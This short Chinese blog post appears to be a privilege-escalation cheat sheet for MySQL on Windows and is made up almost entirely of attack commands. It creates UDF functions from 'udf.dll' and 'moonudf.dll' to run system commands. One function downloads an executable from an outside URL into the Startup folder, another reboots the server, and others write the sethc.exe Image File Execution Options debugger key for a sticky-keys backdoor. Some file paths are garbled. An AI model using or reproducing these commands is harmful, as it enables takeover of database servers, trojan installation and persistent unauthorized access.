这篇文章上次修改于 1562 天前,可能其部分内容已经发生变化,如有疑问可询问作者。
创建函数
create function cmdshell returns string soname ’dll名’ (注意路径);
删除函数
delete function cmdshell;使用函数 select cmdshell(参数列表);
获取参数信息select 函数名("help");
提权 查询
Create function cmdshell returns string soname ’udf.dll’; //此处不能填绝对路径 只能是dll名
查询 select * from mysql.func;
//看看cmdshell function是否创立,创立就继续
查询 select cmdshell(’net user’); //运行各种命令提权
删除函数 drop function MyCmd;
利用downloader函数,下载一个木马或者脚本到启动项
Create Function downloader returns string soname ’moonudf.dll’;select downloader("https://www.admin163.net/xx.exe","C:Documents and SettingsAll Users「开始」菜单程序启动a.exe");
SHUT函数重启服务器
create function shut returns string soname ’moonudf.dll’select shut(‘reboot’);
利用 regwrite和 regread函数劫持Sethc.exe
Create Function regread returns string soname ’moonudf.dll’;Select regread("HKEY_LOCAL_MACHINE","SOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution Optionssethc.exe","debugger")
利用regwrite写入
Create Function regwrite returns string soname ’moonudf.dll’;select regwrite("HKEY_LOCAL_MACHINE","SOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution Optionssethc.exe","debugger","REG_SZ","C: mpcmd.exe");
没有评论